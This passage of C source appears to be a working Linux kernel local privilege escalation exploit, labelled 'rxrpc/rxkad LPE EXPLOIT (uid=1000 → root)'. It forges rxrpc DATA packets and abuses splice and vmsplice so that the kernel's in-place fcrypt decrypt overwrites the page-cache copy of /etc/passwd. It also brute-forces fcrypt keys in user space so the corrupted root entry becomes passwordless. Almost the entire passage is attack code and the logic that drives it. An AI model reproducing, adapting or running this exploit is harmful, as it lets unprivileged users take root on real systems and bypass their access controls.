    long key = add_rxrpc_key(keyname);
    if (key < 0) {
        if (trigger_seq < 5) WARN("add_rxrpc_key(%s): %s", keyname, strerror(errno));
        return -1;
    }

    /* Use varying ports so kernel TIME_WAIT / stale state does not bite. */
    uint16_t port_S = 7777 + (trigger_seq * 2 % 200);
    uint16_t port_C = port_S + 1;
    uint16_t svc_id = 1234;

    int udp_srv = setup_udp_server(port_S);
    if (udp_srv < 0) {
        if (trigger_seq < 5) WARN("setup_udp_server(%u) failed", port_S);
        syscall(SYS_keyctl, 3 /*KEYCTL_INVALIDATE*/, key); return -1;
    }

    int rxsk_cli = setup_rxrpc_client(port_C, keyname);
    if (rxsk_cli < 0) {
        if (trigger_seq < 5) WARN("setup_rxrpc_client(%u, %s) failed", port_C, keyname);
        close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
    }

    if (rxrpc_client_initiate_call(rxsk_cli, port_S, svc_id, 0xDEAD) < 0) {
        if (trigger_seq < 5) WARN("rxrpc_client_initiate_call failed");
        close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
    }

    uint8_t pkt[2048];
    struct sockaddr_in cli_addr;
    ssize_t n = udp_recv_to(udp_srv, pkt, sizeof(pkt), &cli_addr, 1500);
    if (n < (ssize_t)sizeof(struct rxrpc_wire_header)) {
        if (trigger_seq < 5) WARN("udp_recv_to: n=%zd errno=%s", n, strerror(errno));
        close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
    }
    struct rxrpc_wire_header *whdr_in = (struct rxrpc_wire_header *)pkt;
    uint32_t epoch  = ntohl(whdr_in->epoch);
    uint32_t cid    = ntohl(whdr_in->cid);
    uint32_t callN  = ntohl(whdr_in->callNumber);
    uint16_t svc_in = ntohs(whdr_in->serviceId);
    uint16_t cli_port = ntohs(cli_addr.sin_port);

    /* Send CHALLENGE */
    {
        struct {
            struct rxrpc_wire_header hdr;
            struct rxkad_challenge   ch;
        } __attribute__((packed)) c = {0};
        c.hdr.epoch = htonl(epoch);
        c.hdr.cid = htonl(cid);
        c.hdr.callNumber = 0; c.hdr.seq = 0;
        c.hdr.serial = htonl(0x10000);
        c.hdr.type = RXRPC_PACKET_TYPE_CHALLENGE;
        c.hdr.securityIndex = 2;
        c.hdr.serviceId = htons(svc_in);
        c.ch.version = htonl(2); c.ch.nonce = htonl(0xDEADBEEFu);
        c.ch.min_level = htonl(1);
        struct sockaddr_in to = { .sin_family=AF_INET, .sin_port=htons(cli_port),
            .sin_addr.s_addr=htonl(0x7F000001) };
        if (sendto(udp_srv, &c, sizeof(c), 0, (struct sockaddr*)&to, sizeof(to)) < 0) {
            close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
        }
    }

    /* Drain RESPONSE (best-effort) */
    for (int i = 0; i < 4; i++) {
        struct sockaddr_in src;
        if (udp_recv_to(udp_srv, pkt, sizeof(pkt), &src, 500) < 0) break;
    }

    /* csum + cksum with CURRENT SESSION_KEY */
    uint8_t csum_iv[8] = {0};
    if (compute_csum_iv(epoch, cid, 2, SESSION_KEY, csum_iv) < 0) {
        close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
    }
    uint16_t cksum_h = 0;
    if (compute_cksum(cid, callN, 1, SESSION_KEY, csum_iv, &cksum_h) < 0) {
        close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
    }

    /* Build malicious DATA header */
    struct rxrpc_wire_header mal = {0};
    mal.epoch = htonl(epoch);
    mal.cid = htonl(cid);
    mal.callNumber = htonl(callN);
    mal.seq = htonl(1);
    mal.serial = htonl(0x42000);
    mal.type = RXRPC_PACKET_TYPE_DATA;
    mal.flags = RXRPC_LAST_PACKET;
    mal.securityIndex = 2;
    mal.cksum = htons(cksum_h);
    mal.serviceId = htons(svc_in);

    /* connect udp_srv → client port for splice */
    struct sockaddr_in dst = { .sin_family=AF_INET, .sin_port=htons(cli_port),
        .sin_addr.s_addr=htonl(0x7F000001) };
    if (connect(udp_srv, (struct sockaddr*)&dst, sizeof(dst)) < 0) {
        close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
    }

    /* pipe + vmsplice header + splice file → pipe → udp_srv */
    int p[2];
    if (pipe(p) < 0) {
        close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key); return -1;
    }
    {
        struct iovec viv = { .iov_base = &mal, .iov_len = sizeof(mal) };
        if (vmsplice(p[1], &viv, 1, 0) < 0) goto trig_fail;
    }
    {
        loff_t off = splice_off;
        if (splice(target_fd, &off, p[1], NULL, splice_len, SPLICE_F_NONBLOCK) < 0)
            goto trig_fail;
    }
    if (splice(p[0], NULL, udp_srv, NULL, sizeof(mal) + splice_len, 0) < 0) {
        goto trig_fail;
    }
    close(p[0]); close(p[1]);

    /* recvmsg the malicious DATA into the kernel's verify_packet path */
    int fl = fcntl(rxsk_cli, F_GETFL);
    fcntl(rxsk_cli, F_SETFL, fl | O_NONBLOCK);
    for (int round = 0; round < 5; round++) {
        char rb[2048];
        struct sockaddr_rxrpc srx;
        char ccb[256];
        struct msghdr m = {0};
        struct iovec iv = { .iov_base = rb, .iov_len = sizeof(rb) };
        m.msg_name = &srx; m.msg_namelen = sizeof(srx);
        m.msg_iov = &iv;  m.msg_iovlen = 1;
        m.msg_control = ccb; m.msg_controllen = sizeof(ccb);
        ssize_t r = recvmsg(rxsk_cli, &m, 0);
        if (r > 0) break;
        if (errno == EAGAIN || errno == EWOULDBLOCK) usleep(20000);
        else break;
    }
    fcntl(rxsk_cli, F_SETFL, fl);

    close(rxsk_cli);
    close(udp_srv);
    syscall(SYS_keyctl, 3, key);
    return 0;

trig_fail:
    close(p[0]); close(p[1]);
    close(rxsk_cli); close(udp_srv); syscall(SYS_keyctl, 3, key);
    return -1;
}

/* ===================================================================
 * USER-SPACE pcbc(fcrypt) BRUTE-FORCE
 *
 * The kernel's rxkad_verify_packet_1() does an in-place 8-byte
 * pcbc(fcrypt) decrypt with iv=0 over the page-cache page at the splice
 * offset.  pcbc with single 8-B block and IV=0 reduces to a plain
 * fcrypt_decrypt(C, K).  We can therefore search for the right K
 * entirely in user-space — without touching the kernel/VM at all —
 * before applying ONE deterministic kernel trigger.
 *
 * Port of crypto/fcrypt.c from the kernel source (David Howells / KTH).
 * Verified against kernel test vectors:
 *   K=0,         decrypt(0E0900C73EF7ED41) = 00000000
 *   K=1144...66, decrypt(D8ED787477EC0680) = 123456789ABCDEF0
 * =================================================================== */

static const uint8_t fc_sbox0_raw[256] = {
    0xea, 0x7f, 0xb2, 0x64, 0x9d, 0xb0, 0xd9, 0x11, 0xcd, 0x86, 0x86, 0x91, 0x0a, 0xb2, 0x93, 0x06,
    0x0e, 0x06, 0xd2, 0x65, 0x73, 0xc5, 0x28, 0x60, 0xf2, 0x20, 0xb5, 0x38, 0x7e, 0xda, 0x9f, 0xe3,
    0xd2, 0xcf, 0xc4, 0x3c, 0x61, 0xff, 0x4a, 0x4a, 0x35, 0xac, 0xaa, 0x5f, 0x2b, 0xbb, 0xbc, 0x53,
    0x4e, 0x9d, 0x78, 0xa3, 0xdc, 0x09, 0x32, 0x10, 0xc6, 0x6f, 0x66, 0xd6, 0xab, 0xa9, 0xaf, 0xfd,
    0x3b, 0x95, 0xe8, 0x34, 0x9a, 0x81, 0x72, 0x80, 0x9c, 0xf3, 0xec, 0xda, 0x9f, 0x26, 0x76, 0x15,
    0x3e, 0x55, 0x4d, 0xde, 0x84, 0xee, 0xad, 0xc7, 0xf1, 0x6b, 0x3d, 0xd3, 0x04, 0x49, 0xaa, 0x24,
    0x0b, 0x8a, 0x83, 0xba, 0xfa, 0x85, 0xa0, 0xa8, 0xb1, 0xd4, 0x01, 0xd8, 0x70, 0x64, 0xf0, 0x51,
    0xd2, 0xc3, 0xa7, 0x75, 0x8c, 0xa5, 0x64, 0xef, 0x10, 0x4e, 0xb7, 0xc6, 0x61, 0x03, 0xeb, 0x44,
    0x3d, 0xe5, 0xb3, 0x5b, 0xae, 0xd5, 0xad, 0x1d, 0xfa, 0x5a, 0x1e, 0x33, 0xab, 0x93, 0xa2, 0xb7,
    0xe7, 0xa8, 0x45, 0xa4, 0xcd, 0x29, 0x63, 0x44, 0xb6, 0x69, 0x7e, 0x2e, 0x62, 0x03, 0xc8, 0xe0,
    0x17, 0xbb, 0xc7, 0xf3, 0x3f, 0x36, 0xba, 0x71, 0x8e, 0x97, 0x65, 0x60, 0x69, 0xb6, 0xf6, 0xe6,
    0x6e, 0xe0, 0x81, 0x59, 0xe8, 0xaf, 0xdd, 0x95, 0x22, 0x99, 0xfd, 0x63, 0x19, 0x74, 0x61, 0xb1,
    0xb6, 0x5b, 0xae, 0x54, 0xb3, 0x70, 0xff, 0xc6, 0x3b, 0x3e, 0xc1, 0xd7, 0xe1, 0x0e, 0x76, 0xe5,
    0x36, 0x4f, 0x59, 0xc7, 0x08, 0x6e, 0x82, 0xa6, 0x93, 0xc4, 0xaa, 0x26, 0x49, 0xe0, 0x21, 0x64,
    0x07, 0x9f, 0x64, 0x81, 0x9c, 0xbf, 0xf9, 0xd1, 0x43, 0xf8, 0xb6, 0xb9, 0xf1, 0x24, 0x75, 0x03,
    0xe4, 0xb0, 0x99, 0x46, 0x3d, 0xf5, 0xd1, 0x39, 0x72, 0x12, 0xf6, 0xba, 0x0c, 0x0d, 0x42, 0x2e,
};
static const uint8_t fc_sbox1_raw[256] = {
    0x77, 0x14, 0xa6, 0xfe, 0xb2, 0x5e, 0x8c, 0x3e, 0x67, 0x6c, 0xa1, 0x0d, 0xc2, 0xa2, 0xc1, 0x85,
    0x6c, 0x7b, 0x67, 0xc6, 0x23, 0xe3, 0xf2, 0x89, 0x50, 0x9c, 0x03, 0xb7, 0x73, 0xe6, 0xe1, 0x39,
    0x31, 0x2c, 0x27, 0x9f, 0xa5, 0x69, 0x44, 0xd6, 0x23, 0x83, 0x98, 0x7d, 0x3c, 0xb4, 0x2d, 0x99,
    0x1c, 0x1f, 0x8c, 0x20, 0x03, 0x7c, 0x5f, 0xad, 0xf4, 0xfa, 0x95, 0xca, 0x76, 0x44, 0xcd, 0xb6,
    0xb8, 0xa1, 0xa1, 0xbe, 0x9e, 0x54, 0x8f, 0x0b, 0x16, 0x74, 0x31, 0x8a, 0x23, 0x17, 0x04, 0xfa,
    0x79, 0x84, 0xb1, 0xf5, 0x13, 0xab, 0xb5, 0x2e, 0xaa, 0x0c, 0x60, 0x6b, 0x5b, 0xc4, 0x4b, 0xbc,
    0xe2, 0xaf, 0x45, 0x73, 0xfa, 0xc9, 0x49, 0xcd, 0x00, 0x92, 0x7d, 0x97, 0x7a, 0x18, 0x60, 0x3d,
    0xcf, 0x5b, 0xde, 0xc6, 0xe2, 0xe6, 0xbb, 0x8b, 0x06, 0xda, 0x08, 0x15, 0x1b, 0x88, 0x6a, 0x17,
    0x89, 0xd0, 0xa9, 0xc1, 0xc9, 0x70, 0x6b, 0xe5, 0x43, 0xf4, 0x68, 0xc8, 0xd3, 0x84, 0x28, 0x0a,
    0x52, 0x66, 0xa3, 0xca, 0xf2, 0xe3, 0x7f, 0x7a, 0x31, 0xf7, 0x88, 0x94, 0x5e, 0x9c, 0x63, 0xd5,
    0x24, 0x66, 0xfc, 0xb3, 0x57, 0x25, 0xbe, 0x89, 0x44, 0xc4, 0xe0, 0x8f, 0x23, 0x3c, 0x12, 0x52,
    0xf5, 0x1e, 0xf4, 0xcb, 0x18, 0x33, 0x1f, 0xf8, 0x69, 0x10, 0x9d, 0xd3, 0xf7, 0x28, 0xf8, 0x30,
    0x05, 0x5e, 0x32, 0xc0, 0xd5, 0x19, 0xbd, 0x45, 0x8b, 0x5b, 0xfd, 0xbc, 0xe2, 0x5c, 0xa9, 0x96,
    0xef, 0x70, 0xcf, 0xc2, 0x2a, 0xb3, 0x61, 0xad, 0x80, 0x48, 0x81, 0xb7, 0x1d, 0x43, 0xd9, 0xd7,
    0x45, 0xf0, 0xd8, 0x8a, 0x59, 0x7c, 0x57, 0xc1, 0x79, 0xc7, 0x34, 0xd6, 0x43, 0xdf, 0xe4, 0x78,
    0x16, 0x06, 0xda, 0x92, 0x76, 0x51, 0xe1, 0xd4, 0x70, 0x03, 0xe0, 0x2f, 0x96, 0x91, 0x82, 0x80,
};
static const uint8_t fc_sbox2_raw[256] = {
    0xf0, 0x37, 0x24, 0x53, 0x2a, 0x03, 0x83, 0x86, 0xd1, 0xec, 0x50, 0xf0, 0x42, 0x78, 0x2f, 0x6d,
    0xbf, 0x80, 0x87, 0x27, 0x95, 0xe2, 0xc5, 0x5d, 0xf9, 0x6f, 0xdb, 0xb4, 0x65, 0x6e, 0xe7, 0x24,
    0xc8, 0x1a, 0xbb, 0x49, 0xb5, 0x0a, 0x7d, 0xb9, 0xe8, 0xdc, 0xb7, 0xd9, 0x45, 0x20, 0x1b, 0xce,
    0x59, 0x9d, 0x6b, 0xbd, 0x0e, 0x8f, 0xa3, 0xa9, 0xbc, 0x74, 0xa6, 0xf6, 0x7f, 0x5f, 0xb1, 0x68,
    0x84, 0xbc, 0xa9, 0xfd, 0x55, 0x50, 0xe9, 0xb6, 0x13, 0x5e, 0x07, 0xb8, 0x95, 0x02, 0xc0, 0xd0,
    0x6a, 0x1a, 0x85, 0xbd, 0xb6, 0xfd, 0xfe, 0x17, 0x3f, 0x09, 0xa3, 0x8d, 0xfb, 0xed, 0xda, 0x1d,
    0x6d, 0x1c, 0x6c, 0x01, 0x5a, 0xe5, 0x71, 0x3e, 0x8b, 0x6b, 0xbe, 0x29, 0xeb, 0x12, 0x19, 0x34,
    0xcd, 0xb3, 0xbd, 0x35, 0xea, 0x4b, 0xd5, 0xae, 0x2a, 0x79, 0x5a, 0xa5, 0x32, 0x12, 0x7b, 0xdc,
    0x2c, 0xd0, 0x22, 0x4b, 0xb1, 0x85, 0x59, 0x80, 0xc0, 0x30, 0x9f, 0x73, 0xd3, 0x14, 0x48, 0x40,
    0x07, 0x2d, 0x8f, 0x80, 0x0f, 0xce, 0x0b, 0x5e, 0xb7, 0x5e, 0xac, 0x24, 0x94, 0x4a, 0x18, 0x15,
    0x05, 0xe8, 0x02, 0x77, 0xa9, 0xc7, 0x40, 0x45, 0x89, 0xd1, 0xea, 0xde, 0x0c, 0x79, 0x2a, 0x99,
    0x6c, 0x3e, 0x95, 0xdd, 0x8c, 0x7d, 0xad, 0x6f, 0xdc, 0xff, 0xfd, 0x62, 0x47, 0xb3, 0x21, 0x8a,
    0xec, 0x8e, 0x19, 0x18, 0xb4, 0x6e, 0x3d, 0xfd, 0x74, 0x54, 0x1e, 0x04, 0x85, 0xd8, 0xbc, 0x1f,
    0x56, 0xe7, 0x3a, 0x56, 0x67, 0xd6, 0xc8, 0xa5, 0xf3, 0x8e, 0xde, 0xae, 0x37, 0x49, 0xb7, 0xfa,
    0xc8, 0xf4, 0x1f, 0xe0, 0x2a, 0x9b, 0x15, 0xd1, 0x34, 0x0e, 0xb5, 0xe0, 0x44, 0x78, 0x84, 0x59,
    0x56, 0x68, 0x77, 0xa5, 0x14, 0x06, 0xf5, 0x2f, 0x8c, 0x8a, 0x73, 0x80, 0x76, 0xb4, 0x10, 0x86,
};
static const uint8_t fc_sbox3_raw[256] = {
    0xa9, 0x2a, 0x48, 0x51, 0x84, 0x7e, 0x49, 0xe2, 0xb5, 0xb7, 0x42, 0x33, 0x7d, 0x5d, 0xa6, 0x12,
    0x44, 0x48, 0x6d, 0x28, 0xaa, 0x20, 0x6d, 0x57, 0xd6, 0x6b, 0x5d, 0x72, 0xf0, 0x92, 0x5a, 0x1b,
    0x53, 0x80, 0x24, 0x70, 0x9a, 0xcc, 0xa7, 0x66, 0xa1, 0x01, 0xa5, 0x41, 0x97, 0x41, 0x31, 0x82,
    0xf1, 0x14, 0xcf, 0x53, 0x0d, 0xa0, 0x10, 0xcc, 0x2a, 0x7d, 0xd2, 0xbf, 0x4b, 0x1a, 0xdb, 0x16,
    0x47, 0xf6, 0x51, 0x36, 0xed, 0xf3, 0xb9, 0x1a, 0xa7, 0xdf, 0x29, 0x43, 0x01, 0x54, 0x70, 0xa4,
    0xbf, 0xd4, 0x0b, 0x53, 0x44, 0x60, 0x9e, 0x23, 0xa1, 0x18, 0x68, 0x4f, 0xf0, 0x2f, 0x82, 0xc2,
    0x2a, 0x41, 0xb2, 0x42, 0x0c, 0xed, 0x0c, 0x1d, 0x13, 0x3a, 0x3c, 0x6e, 0x35, 0xdc, 0x60, 0x65,
    0x85, 0xe9, 0x64, 0x02, 0x9a, 0x3f, 0x9f, 0x87, 0x96, 0xdf, 0xbe, 0xf2, 0xcb, 0xe5, 0x6c, 0xd4,
    0x5a, 0x83, 0xbf, 0x92, 0x1b, 0x94, 0x00, 0x42, 0xcf, 0x4b, 0x00, 0x75, 0xba, 0x8f, 0x76, 0x5f,
    0x5d, 0x3a, 0x4d, 0x09, 0x12, 0x08, 0x38, 0x95, 0x17, 0xe4, 0x01, 0x1d, 0x4c, 0xa9, 0xcc, 0x85,
    0x82, 0x4c, 0x9d, 0x2f, 0x3b, 0x66, 0xa1, 0x34, 0x10, 0xcd, 0x59, 0x89, 0xa5, 0x31, 0xcf, 0x05,
    0xc8, 0x84, 0xfa, 0xc7, 0xba, 0x4e, 0x8b, 0x1a, 0x19, 0xf1, 0xa1, 0x3b, 0x18, 0x12, 0x17, 0xb0,
    0x98, 0x8d, 0x0b, 0x23, 0xc3, 0x3a, 0x2d, 0x20, 0xdf, 0x13, 0xa0, 0xa8, 0x4c, 0x0d, 0x6c, 0x2f,
    0x47, 0x13, 0x13, 0x52, 0x1f, 0x2d, 0xf5, 0x79, 0x3d, 0xa2, 0x54, 0xbd, 0x69, 0xc8, 0x6b, 0xf3,
    0x05, 0x28, 0xf1, 0x16, 0x46, 0x40, 0xb0, 0x11, 0xd3, 0xb7, 0x95, 0x49, 0xcf, 0xc3, 0x1d, 0x8f,
    0xd8, 0xe1, 0x73, 0xdb, 0xad, 0xc8, 0xc9, 0xa9, 0xa1, 0xc2, 0xc5, 0xe3, 0xba, 0xfc, 0x0e, 0x25,
};

static uint32_t fc_sbox0[256], fc_sbox1[256], fc_sbox2[256], fc_sbox3[256];

#include <endian.h>

static void fcrypt_init_sboxes(void)
{
    for (int i = 0; i < 256; i++) {
        fc_sbox0[i] = htobe32((uint32_t)fc_sbox0_raw[i] << 3);
        fc_sbox1[i] = htobe32(((uint32_t)(fc_sbox1_raw[i] & 0x1f) << 27) |
                ((uint32_t)fc_sbox1_raw[i] >> 5));
        fc_sbox2[i] = htobe32((uint32_t)fc_sbox2_raw[i] << 11);
        fc_sbox3[i] = htobe32((uint32_t)fc_sbox3_raw[i] << 19);
    }
}

#define fc_ror56_64(k, n) \
    (k = (k >> (n)) | ((k & ((1ULL << (n)) - 1)) << (56 - (n))))

typedef struct { uint32_t sched[16]; } fcrypt_uctx;

static void fcrypt_user_setkey(fcrypt_uctx *ctx, const uint8_t key[8])
{
    uint64_t k = 0;
    k  = (uint64_t)(key[0] >> 1);
    k <<= 7; k |= (uint64_t)(key[1] >> 1);
    k <<= 7; k |= (uint64_t)(key[2] >> 1);
    k <<= 7; k |= (uint64_t)(key[3] >> 1);
    k <<= 7; k |= (uint64_t)(key[4] >> 1);
    k <<= 7; k |= (uint64_t)(key[5] >> 1);
    k <<= 7; k |= (uint64_t)(key[6] >> 1);
    k <<= 7; k |= (uint64_t)(key[7] >> 1);

    ctx->sched[0x0] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
    ctx->sched[0x1] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
    ctx->sched[0x2] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
    ctx->sched[0x3] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
    ctx->sched[0x4] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
    ctx->sched[0x5] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
    ctx->sched[0x6] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
    ctx->sched[0x7] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
    ctx->sched[0x8] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
    ctx->sched[0x9] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
    ctx->sched[0xa] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
    ctx->sched[0xb] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
    ctx->sched[0xc] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
    ctx->sched[0xd] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
    ctx->sched[0xe] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
    ctx->sched[0xf] = htobe32((uint32_t)k);
}

#define FC_F(R_, L_, sched_) do {                                        \
    union { uint32_t l; uint8_t c[4]; } u;                               \
    u.l = (sched_) ^ (R_);                                               \
    L_ ^= fc_sbox0[u.c[0]] ^ fc_sbox1[u.c[1]] ^                          \
    fc_sbox2[u.c[2]] ^ fc_sbox3[u.c[3]];                           \
} while (0)

static void fcrypt_user_decrypt(const fcrypt_uctx *ctx,
        uint8_t out[8], const uint8_t in[8])
{
    uint32_t L, R;
    memcpy(&L, in, 4);
    memcpy(&R, in + 4, 4);
    FC_F(L, R, ctx->sched[0xf]);
    FC_F(R, L, ctx->sched[0xe]);
    FC_F(L, R, ctx->sched[0xd]);
    FC_F(R, L, ctx->sched[0xc]);
    FC_F(L, R, ctx->sched[0xb]);
    FC_F(R, L, ctx->sched[0xa]);
    FC_F(L, R, ctx->sched[0x9]);
    FC_F(R, L, ctx->sched[0x8]);
    FC_F(L, R, ctx->sched[0x7]);
    FC_F(R, L, ctx->sched[0x6]);
    FC_F(L, R, ctx->sched[0x5]);
    FC_F(R, L, ctx->sched[0x4]);
    FC_F(L, R, ctx->sched[0x3]);
    FC_F(R, L, ctx->sched[0x2]);
    FC_F(L, R, ctx->sched[0x1]);
    FC_F(R, L, ctx->sched[0x0]);
    memcpy(out, &L, 4);
    memcpy(out + 4, &R, 4);
}

/* For the 2-splice chain we want the line to have EXACTLY 6 ':' and a
 * shell field that equals "/bin/bash" (in /etc/shells, valid path).
 * The two splices interlock as:
 *
 *   bytes 7..14  (offset 2800): P1 — sets uid=0, gid=1 digit, then
 *                4 random gecos-prefix bytes.
 *   bytes 15..22 (offset 2808): P2 — wipes the original ':' at line
 *                pos 16, preserves ':' at pos 21 and '/' at pos 22.
 *
 *   Combined line: "test:x:0:G:GGGGGGGGGG:/home/test:/bin/bash"
 *                   pos 0    8    21       32
 *
 *   pw_uid=0, pw_gid=G, pw_dir="/home/test", pw_shell="/bin/bash".
 *   Now `su -s /bin/bash test` proceeds through the restricted_shell()
 *   check (because /bin/bash IS in /etc/shells) and exec()s /bin/bash
 *   under uid=0.
 *
 * === 3-splice predicates ===
 *
 * After applying splices A, B, C in order to /etc/passwd line 1
 * (offsets 4, 6, 8 — each 8 bytes, last-write-wins), the final state
 * of chars 4..15 is determined by these P bytes:
 *
 *   char 4  = P_A[0]   want: ':'
 *   char 5  = P_A[1]   want: ':'
 *   char 6  = P_B[0]   want: '0'   (overwrites P_A[2])
 *   char 7  = P_B[1]   want: ':'   (overwrites P_A[3])
 *   char 8  = P_C[0]   want: '0'   (overwrites P_A[4]/P_B[2])
 *   char 9  = P_C[1]   want: ':'   (overwrites P_A[5]/P_B[3])
 *   char 10..14 = P_C[2..6]  want: any byte except ':' '\0' '\n'
 *   char 15 = P_C[7]   want: ':'
 *
 * The constraints on P_A[2..7] and P_B[2..7] are vacuous because they
 * are overwritten before /etc/passwd is read by anyone — we only care
 * about the final state. */
static inline int fc_check_pa_nullok(const uint8_t P[8])
{
    return P[0] == ':' && P[1] == ':';
}

static inline int fc_check_pb_nullok(const uint8_t P[8])
{
    return P[0] == '0' && P[1] == ':';
}

static inline int fc_check_pc_nullok(const uint8_t P[8])
{
    if (P[0] != '0') return 0;
    if (P[1] != ':') return 0;
    if (P[7] != ':') return 0;
    for (int i = 2; i < 7; i++) {
        if (P[i] == ':' || P[i] == '\0' || P[i] == '\n') return 0;
    }
    return 1;
}

static uint64_t fc_splitmix64(uint64_t *s)
{
    uint64_t z = (*s += 0x9E3779B97F4A7C15ULL);
    z = (z ^ (z >> 30)) * 0xBF58476D1CE4E5B9ULL;
    z = (z ^ (z >> 27)) * 0x94D049BB133111EBULL;
    return z ^ (z >> 31);
}

/* Generic brute-force.  `predicate` decides if a P is acceptable. */
typedef int (*pcheck_fn)(const uint8_t P[8]);

static int find_K_offline_generic(const uint8_t C[8], uint64_t max_iters,
        pcheck_fn check,
        uint8_t K_out[8], uint8_t P_out[8],
        uint64_t seed_init,
        const char *label)
{
    fcrypt_uctx ctx;
    uint8_t K[8], P[8];
    uint64_t seed = seed_init;
    struct timespec ts0, ts1;
    clock_gettime(CLOCK_MONOTONIC, &ts0);

    for (uint64_t iter = 0; iter < max_iters; iter++) {
        uint64_t r = fc_splitmix64(&seed);
        memcpy(K, &r, 8);
        fcrypt_user_setkey(&ctx, K);
        fcrypt_user_decrypt(&ctx, P, C);

        if (check(P)) {
            memcpy(K_out, K, 8);
            memcpy(P_out, P, 8);
            clock_gettime(CLOCK_MONOTONIC, &ts1);
            double dt = (ts1.tv_sec - ts0.tv_sec) +
                (ts1.tv_nsec - ts0.tv_nsec) / 1e9;
            LOG("%s found after %lu iters in %.2fs (%.2fM/s) K=%02x%02x%02x%02x%02x%02x%02x%02x  P=%02x%02x%02x%02x%02x%02x%02x%02x \"%c%c%c%c%c%c%c%c\"",
                    label,
                    (unsigned long)iter, dt, iter / dt / 1e6,
                    K[0],K[1],K[2],K[3],K[4],K[5],K[6],K[7],
                    P[0],P[1],P[2],P[3],P[4],P[5],P[6],P[7],
                    (P[0]>=32&&P[0]<127)?P[0]:'.',
                    (P[1]>=32&&P[1]<127)?P[1]:'.',
                    (P[2]>=32&&P[2]<127)?P[2]:'.',
                    (P[3]>=32&&P[3]<127)?P[3]:'.',
                    (P[4]>=32&&P[4]<127)?P[4]:'.',
                    (P[5]>=32&&P[5]<127)?P[5]:'.',
                    (P[6]>=32&&P[6]<127)?P[6]:'.',
                    (P[7]>=32&&P[7]<127)?P[7]:'.');
            return 0;
        }

        if ((iter & 0x3ffffff) == 0 && iter > 0) {
            clock_gettime(CLOCK_MONOTONIC, &ts1);
            double dt = (ts1.tv_sec - ts0.tv_sec) +
                (ts1.tv_nsec - ts0.tv_nsec) / 1e9;
            fprintf(stderr, "  [%s %.1fs] iter=%lu (%.2fM/s)\n",
                    label, dt, (unsigned long)iter, iter / dt / 1e6);
        }
    }
    return -1;
}


int rxrpc_lpe_main(int argc, char **argv)
{
    fprintf(stderr, "\n=== rxrpc/rxkad LPE EXPLOIT (uid=1000 → root) ===\n");
    fprintf(stderr, "[*] uid=%u euid=%u gid=%u\n",
            getuid(), geteuid(), getgid());

    {
        const char *no_unshare = getenv("POC_NO_UNSHARE");
        if (!no_unshare || *no_unshare != '1') {
            const char *do_unshare = getenv("POC_UNSHARE");
            if (do_unshare && *do_unshare == '1') {
                if (do_unshare_userns_netns() < 0) return 1;
            }
        }
    }

    /* Open a dummy AF_RXRPC socket to autoload the rxrpc kernel module.
     * Without this, the first add_key("rxrpc", ...) call fails with ENODEV
     * because the kernel key type "rxrpc" is registered by rxrpc_init() in
     * the module load path. */
    {
        int dummy = socket(AF_RXRPC, SOCK_DGRAM, PF_INET);
        if (dummy < 0) {
            WARN("socket(AF_RXRPC): %s — module not loadable?", strerror(errno));
            return 1;
        }
        close(dummy);
        LOG("rxrpc module autoloaded via dummy socket(AF_RXRPC)");
    }

    /* Open /etc/passwd RO and mmap the first page (which contains the
     * root entry on line 1). */
    const char *target_path = getenv("POC_TARGET_FILE");
    if (!target_path || !*target_path) target_path = "/etc/passwd";

    int rfd_ro = open(target_path, O_RDONLY);
    if (rfd_ro < 0) {
        WARN("open %s RO: %s", target_path, strerror(errno));
        return 1;
    }
    struct stat st;
    fstat(rfd_ro, &st);
    if (st.st_size < 32) { WARN("target too small: %lld", (long long)st.st_size); return 1; }
    LOG("target %s opened RO, size=%lld, uid=%u gid=%u mode=%04o",
            target_path, (long long)st.st_size, st.st_uid, st.st_gid,
            st.st_mode & 07777);

    /* mmap first page so the page-cache page stays pinned. */
    void *map = mmap(NULL, 4096, PROT_READ, MAP_SHARED, rfd_ro, 0);
    if (map == MAP_FAILED) { WARN("mmap: %s", strerror(errno)); return 1; }
    LOG("mmap'd %s page-cache at %p (PROT_READ|MAP_SHARED)", target_path, map);

    /* If a previous attempt already left the root entry in the patched
     * "root::0:0:..." form, treat as success and skip the brute-force /
     * trigger stages.  Otherwise proceed regardless of current state —
     * the brute-force re-derives K_A/K_B/K_C from whatever bytes are
     * currently at offsets 4/6/8 of the page-cache page, so it works
     * even on the corrupt residue from a previous failed run. */
    {
        const char *m = (const char *)map;
        if (memcmp(m, "root::0:0", 9) == 0) {
            LOG("/etc/passwd already patched (root::0:0...) — nothing to do");
            return 0;
        }
        LOG("/etc/passwd line 1 first 16 bytes:");
        for (int i = 0; i < 16; i++)
            fprintf(stderr, "%02x ", (uint8_t)m[i]);
        fprintf(stderr, "\n");
    }
    fprintf(stderr, "[*] /etc/passwd line 1 (root entry) BEFORE: '");
    for (int i = 0; i < 32; i++) {
        char c = ((const char *)map)[i];
        fputc((c == '\n') ? '$' : (c >= 32 && c < 127 ? c : '.'), stderr);
    }
    fprintf(stderr, "'\n");

    /* === STAGE 1 — THREE-SPLICE OFFLINE BRUTE FORCE ===
     *
     * Read THREE 8-byte ciphertexts at file offsets 4, 6, 8.  Search
     * independently for K_A (chars 4-5 = "::"), K_B (chars 6-7 = "0:"),
